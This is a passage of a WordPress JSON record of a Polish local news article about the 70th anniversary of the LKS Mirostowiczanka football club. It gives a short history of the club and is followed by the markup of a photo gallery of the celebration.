{"id":6275,"date":"2017-08-14T11:43:34","date_gmt":"2017-08-14T09:43:34","guid":{"rendered":"http:\/\/moja24.pl\/?p=6275"},"modified":"2019-04-27T02:48:09","modified_gmt":"2019-04-27T00:48:09","slug":"mirostowiczanka-z-tradycjami","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/14\/mirostowiczanka-z-tradycjami\/","title":{"rendered":"Mirostowiczanka z tradycjami"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Wspomnienia, podzi\u0119kowania, odznaczenia. Sportowcy, dzia\u0142acze i go\u015bcie LKS Mirostowiczanka z Mirostowic Dolnych \u015bwi\u0119towali siedemdziesi\u0119ciolecie zorganizowanej pi\u0142ki no\u017cnej w swojej miejscowo\u015bci.<\/strong><br \/>\n<\/span><\/p>\n<p>Nie do uwierzenia jest to, \u017ce w Mirostowicach Dolnych kiedy\u015b funkcjonowa\u0142y dwa kluby sportowe. Du\u017ce zak\u0142ady ceramiczne i kopalnia mog\u0142y finansowa\u0107 sport w niewielkiej miejscowo\u015bci. Te czasy raczej nie wr\u00f3c\u0105, a dzisiaj dzia\u0142acze klubu musz\u0105 krok po kroku, systematycznie stara\u0107 si\u0119 o utrzymanie i rozbudow\u0119 niezb\u0119dnej do trening\u00f3w i rozgrywek infrastruktury. Problemem jest jednak brak m\u0142odych ludzi, kt\u00f3rzy chcieliby gra\u0107. Jedni wyjechali za prac\u0105, inni nie chc\u0105 trenowa\u0107, nie maj\u0105c za to gratyfikacji finansowej. Ale nadzieja nie ga\u015bnie. Tradycja zobowi\u0105zuje, a dzia\u0142acze patrz\u0105 w przysz\u0142o\u015b\u0107. Kolejne siedemdziesi\u0105t lat na horyzoncie.<\/p>\n<p><em>Pawe\u0142 Skrzypczy\u0144ski<\/em><\/p>\n<p><strong>Kr\u00f3tka historia starego klubu<\/strong><\/p>\n<p>LKS Mirostowiczanka Mirostowice Dolne powsta\u0142 na bazie swoich dw\u00f3ch poprzednik\u00f3w, dzia\u0142aj\u0105cych w latach 40-tych i 50-tych na terenie wsi. 27 lutego 1947 roku za\u0142o\u017cono przy Zak\u0142adach Ceramicznych, Klub Sportowy Budowlani, w kt\u00f3rym opr\u00f3cz pi\u0142ki no\u017cnej uprawiano te\u017c tenis sto\u0142owy i bryd\u017c sportowy. Pierwszym prezesem klubu zosta\u0142 Aleksander B\u00f3kwar\u00f3w, po nim obowi\u0105zki przej\u0105\u0142 Edward Grajcar. Trenerem pi\u0142karzy by\u0142 w owym czasie Stanis\u0142aw B\u0142ahut. Dru\u017cyna graj\u0105ca w \u00f3wczesnej klasie C, awansowa\u0142a w 1954 roku do klasy B. Wcze\u015bniej, bo w 1953 roku przy kopalni w\u0119gla brunatnego &#8222;Henryk&#8221; powsta\u0142 Klub Pi\u0142karski G\u00f3rnik, kt\u00f3rego prezesem wybrano Zygmunta Hawro. W roku 1956 dosz\u0142o do po\u0142\u0105czenia obu klub\u00f3w w jeden i przyj\u0119cia funkcjonuj\u0105cej do dzi\u015b nazwy LKS Mirostowiczanka Od roku 1957 sekretarzem klubu, a w latach 1964-1979 jego prezesem by\u0142 Jerzy R\u00f3\u017cycki, kt\u00f3rego zas\u0142ugi dla mirostowickiego klubu s\u0105 nieocenione. W po\u0142owie 1979 roku prezesem Mirostowiczanki wybrano Grzegorza Moli\u0144skiego, pe\u0142ni\u0105cego t\u0119 funkcj\u0119 do stycznia 2003 roku, z dwuletni\u0105 przerw\u0105 na prezesur\u0119 Stanis\u0142awa Brukiewy.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item11 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item12 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460a954dda  .td-doubleSlider-2 .td-item13 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69f460a954dda\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">70 lat Klubu Sportowego Mirostowiczanka <\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 13<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13.jpg\" title=\"Mirostowiczanka 70 lat (13)\"  data-caption=\"mecz Oldboy\u00f3w z obecnymi pi\u0142karzami\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-747x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-747x420.jpg 747w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-768x432.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-1024x576.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-13-1068x601.jpg 1068w\" sizes=\"(max-width: 747px) 100vw, 747px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">mecz Oldboy\u00f3w z obecnymi pi\u0142karzami<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12.jpg\" title=\"Mirostowiczanka 70 lat (12)\"  data-caption=\"Obecni pi\u0142karze Mirostowiczanki tworz\u0105 historie klubu\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-747x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-747x420.jpg 747w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-768x432.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-1024x576.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-12-1068x601.jpg 1068w\" sizes=\"(max-width: 747px) 100vw, 747px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">Obecni pi\u0142karze Mirostowiczanki tworz\u0105 historie klubu<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11.jpg\" title=\"Mirostowiczanka 70 lat (11)\"  data-caption=\"Dru\u017cyna Oldboy\u00f3w jak za dawnych lat\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-747x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-747x420.jpg 747w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-768x432.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-1024x576.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-11-1068x601.jpg 1068w\" sizes=\"(max-width: 747px) 100vw, 747px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">Dru\u017cyna Oldboy\u00f3w jak za dawnych lat<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10.jpg\" title=\"Mirostowiczanka 70 lat (10)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-747x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-747x420.jpg 747w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-768x432.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-1024x576.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-10-1068x601.jpg 1068w\" sizes=\"(max-width: 747px) 100vw, 747px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177.jpg\" title=\"Mirostowiczanka 70 lat (9)\"  data-caption=\"Edward Chowaniec, lewoskrzyd\u0142owy Mirostowiczanki, gra\u0142 w klubie w latach 1958-1969\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-236x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177.jpg 1836w\" sizes=\"(max-width: 236px) 100vw, 236px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">Edward Chowaniec, lewoskrzyd\u0142owy Mirostowiczanki, gra\u0142 w klubie w latach 1958-1969<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139.jpg\" title=\"Mirostowiczanka 70 lat (7)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-236x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-7-e1502703285139.jpg 1836w\" sizes=\"(max-width: 236px) 100vw, 236px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361.jpg\" title=\"Mirostowiczanka 70 lat (6)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-236x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-6-e1502703310361.jpg 1836w\" sizes=\"(max-width: 236px) 100vw, 236px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5.jpg\" title=\"Mirostowiczanka 70 lat (5)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-747x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-747x420.jpg 747w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-768x432.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-1024x576.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-5-1068x601.jpg 1068w\" sizes=\"(max-width: 747px) 100vw, 747px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721.jpg\" title=\"Mirostowiczanka 70 lat (4)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-236x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-4-e1502703183721.jpg 1836w\" sizes=\"(max-width: 236px) 100vw, 236px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3.jpg\" title=\"Mirostowiczanka 70 lat (3)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-747x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-747x420.jpg 747w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-768x432.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-1024x576.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-3-1068x601.jpg 1068w\" sizes=\"(max-width: 747px) 100vw, 747px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item11\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2.jpg\" title=\"Mirostowiczanka 70 lat (2)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-747x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-747x420.jpg 747w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-768x432.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-1024x576.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-2-1068x601.jpg 1068w\" sizes=\"(max-width: 747px) 100vw, 747px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item12\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220.jpg\" title=\"Mirostowiczanka 70 lat (1)\"  data-caption=\"Boles\u0142aw Maciejewski odebra\u0142 Srebrn\u0105 Odznak\u0119 Honorow\u0105 PZPN\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-236x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220.jpg 1836w\" sizes=\"(max-width: 236px) 100vw, 236px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">Boles\u0142aw Maciejewski odebra\u0142 Srebrn\u0105 Odznak\u0119 Honorow\u0105 PZPN<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item13\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat.jpg\" title=\"Mirostowiczanka 70 lat\"  data-caption=\"Maciej Szafra\u0144ski czuwa nad groch\u00f3wk\u0105\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat.jpg 700w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-300x168.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-696x391.jpg 696w\" sizes=\"(max-width: 700px) 100vw, 700px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">Maciej Szafra\u0144ski czuwa nad groch\u00f3wk\u0105<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item11\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    